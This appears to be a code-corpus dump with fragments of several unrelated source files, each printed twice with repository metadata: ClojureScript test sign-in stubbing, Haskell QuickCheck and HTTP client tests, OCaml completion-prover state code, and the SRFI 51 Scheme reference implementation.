(ajax/call {:url (str "="
(js/encodeURIComponent auth-token))
:on-done
(fn [{:keys [status-code success? get-parsed-response raw-response]}]
use console.warn to make sure logs are captured by selenium
(js/console.warn (str "force-signed-in: <" success? "> " raw-response))
(if success?
(let [{:keys [email sub]} (get-parsed-response)
auth2 (clj->js
{:currentUser
{:get
(constantly
(clj->js
{:getAuthResponse
(constantly (clj->js {:access_token auth-token}))
:getBasicProfile
(constantly (clj->js {:getEmail (constantly email)
:getId (constantly sub)}))
:hasGrantedScopes (constantly true)}))
:listen (constantly nil)}
:signOut on-sign-out})]
(user/set-google-auth2-instance! auth2)
(on-sign-in)
(when (some? extra-on-sign-in)
(extra-on-sign-in)))
(on-error {:status status-code :response raw-response})))})))
(defn render-forced-sign-in-error [error]
[:div {}
[:div {} "Status: " (:status error)]
[:div {} "Response: " (:response error)]])
(defn add-nav-paths []
(nav/defpath
:policy
{:public? true
:component PolicyPage
:regex #"policy"
:make-props (fn [_] {})
:make-path (fn [] "policy")}))
|
47a85b0d9ca8279117649830004b4d4337649bf8b87be37993fbcf2ffaf9660c | PhDP/Akarui | Properties.hs | import Test.QuickCheck
import Test.QuickCheck.Test (isSuccess)
import Control.Monad
import System.Exit (exitFailure)
import PredicateSpec
import FOLSpec
main :: IO ()
main = do
let
tests =
[ quickCheckResult prop_predicate_eq_itself
, quickCheckResult prop_predicate_cmp_itself
, quickCheckResult prop_predicate_ord
-- , quickCheckResult prop_parsing_back -- Will be reinstated once I figure out how to handle top/bot printing.
, quickCheckResult prop_fol_ord
, quickCheckResult prop_fol_self_eq
]
success <- fmap (all isSuccess) . sequence $ tests
unless success exitFailure
| null | https://raw.githubusercontent.com/PhDP/Akarui/4ad888d011f7115677e8f9ba18887865f5150746/tests/Properties.hs | haskell | , quickCheckResult prop_parsing_back -- Will be reinstated once I figure out how to handle top/bot printing. | import Test.QuickCheck
import Test.QuickCheck.Test (isSuccess)
import Control.Monad
import System.Exit (exitFailure)
import PredicateSpec
import FOLSpec
main :: IO ()
main = do
let
tests =
[ quickCheckResult prop_predicate_eq_itself
, quickCheckResult prop_predicate_cmp_itself
, quickCheckResult prop_predicate_ord
, quickCheckResult prop_fol_ord
, quickCheckResult prop_fol_self_eq
]
success <- fmap (all isSuccess) . sequence $ tests
unless success exitFailure
|
bf0f1d313a1060ec6d7c9d9325ccc51d4830c95b8408dcc489a2c5ad6332e752 | bytekid/mkbtt | nodeState.ml | Copyright 2010
* GNU Lesser General Public License
*
* This file is part of MKBtt .
*
* is free software : you can redistribute it and/or modify it under
* the terms of the GNU Lesser General Public License as published by the
* Free Software Foundation , either version 3 of the License , or ( at your
* option ) any later version .
*
* is distributed in the hope that it will be useful , but WITHOUT
* ANY WARRANTY ; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE . See the GNU Lesser General Public
* License for more details .
*
* You should have received a copy of the GNU Lesser General Public
* License along with MKBtt . If not , see < / > .
* GNU Lesser General Public License
*
* This file is part of MKBtt.
*
* MKBtt is free software: you can redistribute it and/or modify it under
* the terms of the GNU Lesser General Public License as published by the
* Free Software Foundation, either version 3 of the License, or (at your
* option) any later version.
*
* MKBtt is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
* License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with MKBtt. If not, see </>.
*)
* Functions related to node state in global monad .
@author
@since 2010/10/12
@author Sarah Winkler
@since 2010/10/12 *)
(*** OPENS ***************************************************************)
open Util;;
* * SUBMODULES ( 1 ) * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
module Term = U.Term;;
module W = World;;
module N = IndexedNode;;
module NI = NodeTermIndexx;;
module Monad = W.Monad;;
(*** OPENS ***************************************************************)
open Monad;;
open World;;
(*** FUNCTIONS ***********************************************************)
" % s\n " s ;
let open_nodes = W.get_node_state >>= fun c -> return c.open_nodes
let closed_nodes = W.get_node_state >>= fun c -> return c.closed_nodes
let non_empty_open_nodes_exist =
open_nodes >>= fun o ->
filter N.has_non_empty_labels o >>= fun o' ->
return (not(List.is_empty o'))
;;
let all_nodes =
W.get_node_state >>= fun c ->
return (List.union c.closed_nodes c.open_nodes)
;;
let set_open ns =
W.get_node_state >>= fun c ->
W.set_node_state {c with open_nodes = ns}
;;
let add_open ns =
W.get_node_state >>= fun c ->
W.set_node_state {c with open_nodes = List.union ns c.open_nodes}
;;
let remove_open n =
W.get_node_state >>= fun c ->
W.set_node_state {c with open_nodes = List.remove n c.open_nodes}
;;
let remove_closed n =
W.get_node_state >>= fun c ->
W.set_node_state {c with closed_nodes = List.remove n c.closed_nodes}
;;
let index_add_closed_node n =
(*log2 "index_add_closed_node" >>*)
NI.add_node n >>
W.get_node_state >>= fun c ->
W.set_node_state {c with closed_nodes=List.union [n] c.closed_nodes}
;;
let split_state s =
W.get_node_state >>= fun c ->
iter (N.split s) c.open_nodes >>
iter (N.split s) c.closed_nodes >>
CompletionProcessx.split_state s >>
GoalState.split s
;;
(*let rewrite_index = M.NodeTermIndex.rewrite_index*)
let restrict_to_process p =
W.get_node_state >>= fun c ->
iter (N.restrict_to_process p) c.open_nodes >>
iter (N.restrict_to_process p) c.closed_nodes >>
GoalState.restrict_to_process p
;;
let remove_processes ps =
W.get_node_state >>= fun c ->
iter (N.remove_processes ps) c.open_nodes >>
iter (N.remove_processes ps) c.closed_nodes >>
CompletionProcessx.remove ps >>
GoalState.remove_processes ps
;;
let project_r_closed p =
closed_nodes >>= NodeSet.project_r_closed p
;;
let project_e_closed p =
closed_nodes >>= NodeSet.project_e_closed p
;;
let er_contain_closed p =
closed_nodes >>= filter (N.er_contains_closed p)
;;
let get_projections p =
all_nodes >>= fun ns -> NodeSet.project_e p ns >>= fun e ->
NodeSet.project_r p ns >>= fun r ->
NodeSet.project_c p ns >>= fun c ->
return (e,r,c)
;;
let get_projections_with_class p =
all_nodes >>= fun ns ->
NodeSet.project_e_with_class p ns >>= fun e ->
NodeSet.project_r_with_class p ns >>= fun r ->
NodeSet.project_c_with_class p ns >>= fun c ->
return (e,r,c)
;;
let single_rindex i =
let add (t,v) s idx =
NI.indexing_required t s v >>= fun b ->
if b then NI.insert_one idx (t,v)
else return idx
in
N.data i >>= fun (s, t) ->
NI.empty_rindex >>=
add (s,(i, true)) t >>= add (t,(i, false)) s
;;
| null | https://raw.githubusercontent.com/bytekid/mkbtt/c2f8e0615389b52eabd12655fe48237aa0fe83fd/src/mkbtt/nodeState.ml | ocaml | ** OPENS **************************************************************
** OPENS **************************************************************
** FUNCTIONS **********************************************************
log2 "index_add_closed_node" >>
let rewrite_index = M.NodeTermIndex.rewrite_index | Copyright 2010
* GNU Lesser General Public License
*
* This file is part of MKBtt .
*
* is free software : you can redistribute it and/or modify it under
* the terms of the GNU Lesser General Public License as published by the
* Free Software Foundation , either version 3 of the License , or ( at your
* option ) any later version .
*
* is distributed in the hope that it will be useful , but WITHOUT
* ANY WARRANTY ; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE . See the GNU Lesser General Public
* License for more details .
*
* You should have received a copy of the GNU Lesser General Public
* License along with MKBtt . If not , see < / > .
* GNU Lesser General Public License
*
* This file is part of MKBtt.
*
* MKBtt is free software: you can redistribute it and/or modify it under
* the terms of the GNU Lesser General Public License as published by the
* Free Software Foundation, either version 3 of the License, or (at your
* option) any later version.
*
* MKBtt is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
* License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with MKBtt. If not, see </>.
*)
* Functions related to node state in global monad .
@author
@since 2010/10/12
@author Sarah Winkler
@since 2010/10/12 *)
open Util;;
* * SUBMODULES ( 1 ) * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
module Term = U.Term;;
module W = World;;
module N = IndexedNode;;
module NI = NodeTermIndexx;;
module Monad = W.Monad;;
open Monad;;
open World;;
" % s\n " s ;
let open_nodes = W.get_node_state >>= fun c -> return c.open_nodes
let closed_nodes = W.get_node_state >>= fun c -> return c.closed_nodes
let non_empty_open_nodes_exist =
open_nodes >>= fun o ->
filter N.has_non_empty_labels o >>= fun o' ->
return (not(List.is_empty o'))
;;
let all_nodes =
W.get_node_state >>= fun c ->
return (List.union c.closed_nodes c.open_nodes)
;;
let set_open ns =
W.get_node_state >>= fun c ->
W.set_node_state {c with open_nodes = ns}
;;
let add_open ns =
W.get_node_state >>= fun c ->
W.set_node_state {c with open_nodes = List.union ns c.open_nodes}
;;
let remove_open n =
W.get_node_state >>= fun c ->
W.set_node_state {c with open_nodes = List.remove n c.open_nodes}
;;
let remove_closed n =
W.get_node_state >>= fun c ->
W.set_node_state {c with closed_nodes = List.remove n c.closed_nodes}
;;
let index_add_closed_node n =
NI.add_node n >>
W.get_node_state >>= fun c ->
W.set_node_state {c with closed_nodes=List.union [n] c.closed_nodes}
;;
let split_state s =
W.get_node_state >>= fun c ->
iter (N.split s) c.open_nodes >>
iter (N.split s) c.closed_nodes >>
CompletionProcessx.split_state s >>
GoalState.split s
;;
let restrict_to_process p =
W.get_node_state >>= fun c ->
iter (N.restrict_to_process p) c.open_nodes >>
iter (N.restrict_to_process p) c.closed_nodes >>
GoalState.restrict_to_process p
;;
let remove_processes ps =
W.get_node_state >>= fun c ->
iter (N.remove_processes ps) c.open_nodes >>
iter (N.remove_processes ps) c.closed_nodes >>
CompletionProcessx.remove ps >>
GoalState.remove_processes ps
;;
let project_r_closed p =
closed_nodes >>= NodeSet.project_r_closed p
;;
let project_e_closed p =
closed_nodes >>= NodeSet.project_e_closed p
;;
let er_contain_closed p =
closed_nodes >>= filter (N.er_contains_closed p)
;;
let get_projections p =
all_nodes >>= fun ns -> NodeSet.project_e p ns >>= fun e ->
NodeSet.project_r p ns >>= fun r ->
NodeSet.project_c p ns >>= fun c ->
return (e,r,c)
;;
let get_projections_with_class p =
all_nodes >>= fun ns ->
NodeSet.project_e_with_class p ns >>= fun e ->
NodeSet.project_r_with_class p ns >>= fun r ->
NodeSet.project_c_with_class p ns >>= fun c ->
return (e,r,c)
;;
let single_rindex i =
let add (t,v) s idx =
NI.indexing_required t s v >>= fun b ->
if b then NI.insert_one idx (t,v)
else return idx
in
N.data i >>= fun (s, t) ->
NI.empty_rindex >>=
add (s,(i, true)) t >>= add (t,(i, false)) s
;;
|
bb7e19ed8500a49799fc5e6003dfd183018f859ac969d35a108f385755fd18ec | arcfide/chez-srfi | srfi-51-impl.scm | ;;
Reference implementation of SRFI 51
;;
Copyright ( C ) ( 2004 ) . All Rights Reserved .
;;
;; Permission is hereby granted, free of charge, to any person obtaining a copy
;; of this software and associated documentation files (the "Software"), to
deal in the Software without restriction , including without limitation the
;; rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
sell copies of the Software , and to permit persons to whom the Software is
;; furnished to do so, subject to the following conditions:
;;
;; The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software .
;;
THE SOFTWARE IS PROVIDED " AS IS " , WITHOUT WARRANTY OF ANY KIND , EXPRESS OR
;; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
;; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
;; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY , WHETHER IN AN ACTION OF CONTRACT , TORT OR OTHERWISE , ARISING
;; FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
;; IN THE SOFTWARE.
;;
(define (rest-values rest . default)
(let* ((caller (if (or (null? default)
(boolean? (car default))
(integer? (car default))
(memq (car default) (list + -)))
'()
(if (string? rest) rest (list rest))))
(rest-list (if (null? caller) rest (car default)))
(rest-length (if (list? rest-list)
(length rest-list)
(if (string? caller)
(error caller rest-list 'rest-list
'(list? rest-list))
(apply error "bad rest list" rest-list 'rest-list
'(list? rest-list) caller))))
(default (if (null? caller) default (cdr default)))
(default-list (if (null? default) default (cdr default)))
(default-length (length default-list))
(number
(and (not (null? default))
(let ((option (car default)))
(or (and (integer? option)
(or (and (> rest-length (abs option))
(if (string? caller)
(error caller rest-list 'rest-list
`(<= (length rest-list)
,(abs option)))
(apply error "too many arguments"
rest-list 'rest-list
`(<= (length rest-list)
,(abs option))
caller)))
(and (> default-length (abs option))
(if (string? caller)
(error caller default-list
'default-list
`(<= (length default-list)
,(abs option)))
(apply error "too many defaults"
default-list 'default-list
`(<= (length default-list)
,(abs option))
caller)))
option))
(eq? option #t)
(and (not option) 'false)
(and (eq? option +) +)
(and (eq? option -) -)
(if (string? caller)
(error caller option 'option
'(or (boolean? option)
(integer? option)
(memq option (list + -))))
(apply error "bad optional argument" option 'option
'(or (boolean? option)
(integer? option)
(memq option (list + -)))
caller)))))))
(cond
((or (eq? #t number) (eq? 'false number))
(and (not (every pair? default-list))
(if (string? caller)
(error caller default-list 'default-list
'(every pair? default-list))
(apply error "bad default list" default-list 'default-list
'(every pair? default-list) caller)))
(let loop ((rest-list rest-list)
(default-list default-list)
(result '()))
(if (null? default-list)
(if (null? rest-list)
(apply values (reverse result))
(if (eq? #t number)
(if (string? caller)
(error caller rest-list 'rest-list '(null? rest-list))
(apply error "bad argument" rest-list 'rest-list
'(null? rest-list) caller))
(apply values (append-reverse result rest-list))))
(if (null? rest-list)
(apply values (append-reverse result (map car default-list)))
(let ((default (car default-list)))
(let lp ((rest rest-list)
(head '()))
(if (null? rest)
(loop (reverse head)
(cdr default-list)
(cons (car default) result))
(if (list? default)
(if (member (car rest) default)
(loop (append-reverse head (cdr rest))
(cdr default-list)
(cons (car rest) result))
(lp (cdr rest) (cons (car rest) head)))
(if ((cdr default) (car rest))
(loop (append-reverse head (cdr rest))
(cdr default-list)
(cons (car rest) result))
(lp (cdr rest) (cons (car rest) head)))))))))))
((or (and (integer? number) (> number 0))
(eq? number +))
(and (not (every pair? default-list))
(if (string? caller)
(error caller default-list 'default-list
'(every pair? default-list))
(apply error "bad default list" default-list 'default-list
'(every pair? default-list) caller)))
(let loop ((rest rest-list)
(default default-list))
(if (or (null? rest) (null? default))
(apply values
(if (> default-length rest-length)
(append rest-list
(map car (list-tail default-list rest-length)))
rest-list))
(let ((arg (car rest))
(par (car default)))
(if (list? par)
(if (member arg par)
(loop (cdr rest) (cdr default))
(if (string? caller)
(error caller arg 'arg `(member arg ,par))
(apply error "unmatched argument"
arg 'arg `(member arg ,par) caller)))
(if ((cdr par) arg)
(loop (cdr rest) (cdr default))
(if (string? caller)
(error caller arg 'arg `(,(cdr par) arg))
(apply error "incorrect argument"
arg 'arg `(,(cdr par) arg) caller))))))))
(else
(apply values (if (> default-length rest-length)
(append rest-list (list-tail default-list rest-length))
rest-list))))))
(define-syntax arg-and
(syntax-rules()
((arg-and arg (a1 a2 ...) ...)
(and (or (symbol? 'arg)
(error "bad syntax" 'arg '(symbol? 'arg)
'(arg-and arg (a1 a2 ...) ...)))
(or (a1 a2 ...)
(error "incorrect argument" arg 'arg '(a1 a2 ...)))
...))
((arg-and caller arg (a1 a2 ...) ...)
(and (or (symbol? 'arg)
(error "bad syntax" 'arg '(symbol? 'arg)
'(arg-and caller arg (a1 a2 ...) ...)))
(or (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))))
;; accessory macro for arg-ands
(define-syntax caller-arg-and
(syntax-rules()
((caller-arg-and caller arg (a1 a2 ...) ...)
(and (or (symbol? 'arg)
(error "bad syntax" 'arg '(symbol? 'arg)
'(caller-arg-and caller arg (a1 a2 ...) ...)))
(or (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))
((caller-arg-and null caller arg (a1 a2 ...) ...)
(and (or (symbol? 'arg)
(error "bad syntax" 'arg '(symbol? 'arg)
'(caller-arg-and caller arg (a1 a2 ...) ...)))
(or (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))))
(define-syntax arg-ands
(syntax-rules (common)
((arg-ands (a1 a2 ...) ...)
(and (arg-and a1 a2 ...) ...))
((arg-ands common caller (a1 a2 ...) ...)
(and (caller-arg-and caller a1 a2 ...) ...))))
(define-syntax arg-or
(syntax-rules()
((arg-or arg (a1 a2 ...) ...)
(or (and (not (symbol? 'arg))
(error "bad syntax" 'arg '(symbol? 'arg)
'(arg-or arg (a1 a2 ...) ...)))
(and (a1 a2 ...)
(error "incorrect argument" arg 'arg '(a1 a2 ...)))
...))
((arg-or caller arg (a1 a2 ...) ...)
(or (and (not (symbol? 'arg))
(error "bad syntax" 'arg '(symbol? 'arg)
'(arg-or caller arg (a1 a2 ...) ...)))
(and (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))))
;; accessory macro for arg-ors
(define-syntax caller-arg-or
(syntax-rules()
((caller-arg-or caller arg (a1 a2 ...) ...)
(or (and (not (symbol? 'arg))
(error "bad syntax" 'arg '(symbol? 'arg)
'(caller-arg-or caller arg (a1 a2 ...) ...)))
(and (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))
((caller-arg-or null caller arg (a1 a2 ...) ...)
(or (and (not (symbol? 'arg))
(error "bad syntax" 'arg '(symbol? 'arg)
'(caller-arg-or caller arg (a1 a2 ...) ...)))
(and (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))))
(define-syntax arg-ors
(syntax-rules (common)
((arg-ors (a1 a2 ...) ...)
(or (arg-or a1 a2 ...) ...))
((arg-ors common caller (a1 a2 ...) ...)
(or (caller-arg-or caller a1 a2 ...) ...))))
(define-syntax err-and
(syntax-rules ()
((err-and err expression ...)
(and (or expression
(if (string? err)
(error err 'expression)
(error "false expression" 'expression err)))
...))))
(define-syntax err-ands
(syntax-rules ()
((err-ands (err expression ...) ...)
(and (err-and err expression ...)
...))))
(define-syntax err-or
(syntax-rules ()
((err-or err expression ...)
(or (and expression
(if (string? err)
(error err 'expression)
(error "true expression" 'expression err)))
...))))
(define-syntax err-ors
(syntax-rules ()
((err-ors (err expression ...) ...)
(or (err-or err expression ...)
...))))
| null | https://raw.githubusercontent.com/arcfide/chez-srfi/96fb553b6ba0834747d5ccfc08c181aa8fd5f612/%253a51/srfi-51-impl.scm | scheme |
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.
accessory macro for arg-ands
accessory macro for arg-ors | Reference implementation of SRFI 51
Copyright ( C ) ( 2004 ) . All Rights Reserved .
deal in the Software without restriction , including without limitation the
sell copies of the Software , and to permit persons to whom the Software is
all copies or substantial portions of the Software .
THE SOFTWARE IS PROVIDED " AS IS " , WITHOUT WARRANTY OF ANY KIND , EXPRESS OR
LIABILITY , WHETHER IN AN ACTION OF CONTRACT , TORT OR OTHERWISE , ARISING
(define (rest-values rest . default)
(let* ((caller (if (or (null? default)
(boolean? (car default))
(integer? (car default))
(memq (car default) (list + -)))
'()
(if (string? rest) rest (list rest))))
(rest-list (if (null? caller) rest (car default)))
(rest-length (if (list? rest-list)
(length rest-list)
(if (string? caller)
(error caller rest-list 'rest-list
'(list? rest-list))
(apply error "bad rest list" rest-list 'rest-list
'(list? rest-list) caller))))
(default (if (null? caller) default (cdr default)))
(default-list (if (null? default) default (cdr default)))
(default-length (length default-list))
(number
(and (not (null? default))
(let ((option (car default)))
(or (and (integer? option)
(or (and (> rest-length (abs option))
(if (string? caller)
(error caller rest-list 'rest-list
`(<= (length rest-list)
,(abs option)))
(apply error "too many arguments"
rest-list 'rest-list
`(<= (length rest-list)
,(abs option))
caller)))
(and (> default-length (abs option))
(if (string? caller)
(error caller default-list
'default-list
`(<= (length default-list)
,(abs option)))
(apply error "too many defaults"
default-list 'default-list
`(<= (length default-list)
,(abs option))
caller)))
option))
(eq? option #t)
(and (not option) 'false)
(and (eq? option +) +)
(and (eq? option -) -)
(if (string? caller)
(error caller option 'option
'(or (boolean? option)
(integer? option)
(memq option (list + -))))
(apply error "bad optional argument" option 'option
'(or (boolean? option)
(integer? option)
(memq option (list + -)))
caller)))))))
(cond
((or (eq? #t number) (eq? 'false number))
(and (not (every pair? default-list))
(if (string? caller)
(error caller default-list 'default-list
'(every pair? default-list))
(apply error "bad default list" default-list 'default-list
'(every pair? default-list) caller)))
(let loop ((rest-list rest-list)
(default-list default-list)
(result '()))
(if (null? default-list)
(if (null? rest-list)
(apply values (reverse result))
(if (eq? #t number)
(if (string? caller)
(error caller rest-list 'rest-list '(null? rest-list))
(apply error "bad argument" rest-list 'rest-list
'(null? rest-list) caller))
(apply values (append-reverse result rest-list))))
(if (null? rest-list)
(apply values (append-reverse result (map car default-list)))
(let ((default (car default-list)))
(let lp ((rest rest-list)
(head '()))
(if (null? rest)
(loop (reverse head)
(cdr default-list)
(cons (car default) result))
(if (list? default)
(if (member (car rest) default)
(loop (append-reverse head (cdr rest))
(cdr default-list)
(cons (car rest) result))
(lp (cdr rest) (cons (car rest) head)))
(if ((cdr default) (car rest))
(loop (append-reverse head (cdr rest))
(cdr default-list)
(cons (car rest) result))
(lp (cdr rest) (cons (car rest) head)))))))))))
((or (and (integer? number) (> number 0))
(eq? number +))
(and (not (every pair? default-list))
(if (string? caller)
(error caller default-list 'default-list
'(every pair? default-list))
(apply error "bad default list" default-list 'default-list
'(every pair? default-list) caller)))
(let loop ((rest rest-list)
(default default-list))
(if (or (null? rest) (null? default))
(apply values
(if (> default-length rest-length)
(append rest-list
(map car (list-tail default-list rest-length)))
rest-list))
(let ((arg (car rest))
(par (car default)))
(if (list? par)
(if (member arg par)
(loop (cdr rest) (cdr default))
(if (string? caller)
(error caller arg 'arg `(member arg ,par))
(apply error "unmatched argument"
arg 'arg `(member arg ,par) caller)))
(if ((cdr par) arg)
(loop (cdr rest) (cdr default))
(if (string? caller)
(error caller arg 'arg `(,(cdr par) arg))
(apply error "incorrect argument"
arg 'arg `(,(cdr par) arg) caller))))))))
(else
(apply values (if (> default-length rest-length)
(append rest-list (list-tail default-list rest-length))
rest-list))))))
(define-syntax arg-and
(syntax-rules()
((arg-and arg (a1 a2 ...) ...)
(and (or (symbol? 'arg)
(error "bad syntax" 'arg '(symbol? 'arg)
'(arg-and arg (a1 a2 ...) ...)))
(or (a1 a2 ...)
(error "incorrect argument" arg 'arg '(a1 a2 ...)))
...))
((arg-and caller arg (a1 a2 ...) ...)
(and (or (symbol? 'arg)
(error "bad syntax" 'arg '(symbol? 'arg)
'(arg-and caller arg (a1 a2 ...) ...)))
(or (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))))
(define-syntax caller-arg-and
(syntax-rules()
((caller-arg-and caller arg (a1 a2 ...) ...)
(and (or (symbol? 'arg)
(error "bad syntax" 'arg '(symbol? 'arg)
'(caller-arg-and caller arg (a1 a2 ...) ...)))
(or (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))
((caller-arg-and null caller arg (a1 a2 ...) ...)
(and (or (symbol? 'arg)
(error "bad syntax" 'arg '(symbol? 'arg)
'(caller-arg-and caller arg (a1 a2 ...) ...)))
(or (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))))
(define-syntax arg-ands
(syntax-rules (common)
((arg-ands (a1 a2 ...) ...)
(and (arg-and a1 a2 ...) ...))
((arg-ands common caller (a1 a2 ...) ...)
(and (caller-arg-and caller a1 a2 ...) ...))))
(define-syntax arg-or
(syntax-rules()
((arg-or arg (a1 a2 ...) ...)
(or (and (not (symbol? 'arg))
(error "bad syntax" 'arg '(symbol? 'arg)
'(arg-or arg (a1 a2 ...) ...)))
(and (a1 a2 ...)
(error "incorrect argument" arg 'arg '(a1 a2 ...)))
...))
((arg-or caller arg (a1 a2 ...) ...)
(or (and (not (symbol? 'arg))
(error "bad syntax" 'arg '(symbol? 'arg)
'(arg-or caller arg (a1 a2 ...) ...)))
(and (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))))
(define-syntax caller-arg-or
(syntax-rules()
((caller-arg-or caller arg (a1 a2 ...) ...)
(or (and (not (symbol? 'arg))
(error "bad syntax" 'arg '(symbol? 'arg)
'(caller-arg-or caller arg (a1 a2 ...) ...)))
(and (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))
((caller-arg-or null caller arg (a1 a2 ...) ...)
(or (and (not (symbol? 'arg))
(error "bad syntax" 'arg '(symbol? 'arg)
'(caller-arg-or caller arg (a1 a2 ...) ...)))
(and (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))))
(define-syntax arg-ors
(syntax-rules (common)
((arg-ors (a1 a2 ...) ...)
(or (arg-or a1 a2 ...) ...))
((arg-ors common caller (a1 a2 ...) ...)
(or (caller-arg-or caller a1 a2 ...) ...))))
(define-syntax err-and
(syntax-rules ()
((err-and err expression ...)
(and (or expression
(if (string? err)
(error err 'expression)
(error "false expression" 'expression err)))
...))))
(define-syntax err-ands
(syntax-rules ()
((err-ands (err expression ...) ...)
(and (err-and err expression ...)
...))))
(define-syntax err-or
(syntax-rules ()
((err-or err expression ...)
(or (and expression
(if (string? err)
(error err 'expression)
(error "true expression" 'expression err)))
...))))
(define-syntax err-ors
(syntax-rules ()
((err-ors (err expression ...) ...)
(or (err-or err expression ...)
...))))
|
0f6bc9365a64d96d3ad69bddf5c17e8e8785566efd05e0afc48c2398e4aeb455 | snoyberg/http-client | test.hs | {-# LANGUAGE OverloadedStrings #-}
import Network.HTTP.Conduit
import Network
import qualified Data.ByteString as S
import qualified Data.ByteString.Lazy as L
import System.Environment.UTF8 (getArgs, getEnv)
import Data.CaseInsensitive (original)
import Data.Conduit
import Control.Monad.IO.Class (liftIO)
import Control.Exception (finally)
import Network.Socks5 (SocksConf(..), defaultSocksConf)
mproxify sockshost req
| sockshost == "" = req
| otherwise = req { socksProxy = Just $ defaultSocksConf sockshost 1080 }
main :: IO ()
main = do
[url] <- getArgs
proxy <- catch (getEnv "SOCKS_PROXY") (const $ return "")
_req2 <- mproxify proxy `fmap` parseUrl url
{-
let req = urlEncodedBody
[ ("foo", "bar")
, ("baz%%38**.8fn", "bin")
] _req2
-}
flip finally printOpenSockets $ runResourceT $ do
man <- newManager
Response sc hs b <- httpLbs _req2 man
liftIO $ do
print sc
mapM_ (\(x, y) -> do
S.putStr $ original x
putStr ": "
S.putStr y
putStrLn "") hs
putStrLn ""
L.putStr b
| null | https://raw.githubusercontent.com/snoyberg/http-client/106951809b3e1c796ffd6cccefc4c1fad16df7c9/http-conduit/test.hs | haskell | # LANGUAGE OverloadedStrings #
let req = urlEncodedBody
[ ("foo", "bar")
, ("baz%%38**.8fn", "bin")
] _req2
| import Network.HTTP.Conduit
import Network
import qualified Data.ByteString as S
import qualified Data.ByteString.Lazy as L
import System.Environment.UTF8 (getArgs, getEnv)
import Data.CaseInsensitive (original)
import Data.Conduit
import Control.Monad.IO.Class (liftIO)
import Control.Exception (finally)
import Network.Socks5 (SocksConf(..), defaultSocksConf)
mproxify sockshost req
| sockshost == "" = req
| otherwise = req { socksProxy = Just $ defaultSocksConf sockshost 1080 }
main :: IO ()
main = do
[url] <- getArgs
proxy <- catch (getEnv "SOCKS_PROXY") (const $ return "")
_req2 <- mproxify proxy `fmap` parseUrl url
flip finally printOpenSockets $ runResourceT $ do
man <- newManager
Response sc hs b <- httpLbs _req2 man
liftIO $ do
print sc
mapM_ (\(x, y) -> do
S.putStr $ original x
putStr ": "
S.putStr y
putStrLn "") hs
putStrLn ""
L.putStr b
|
e5eef3c1af4f1026b31e147f260c067ae8d6a0e9cec0f10e61f72ee32dc75351 | robstewart57/rdf4h | TList.hs | # LANGUAGE CPP #
{-# LANGUAGE DeriveAnyClass #-}
# LANGUAGE DataKinds #
# LANGUAGE FlexibleInstances #
# LANGUAGE TypeFamilies #
# LANGUAGE DeriveGeneric #
{-# LANGUAGE EmptyDataDecls #-}
-- |"TriplesGraph" contains a list-backed graph implementation suitable
-- for smallish graphs or for temporary graphs that will not be queried.
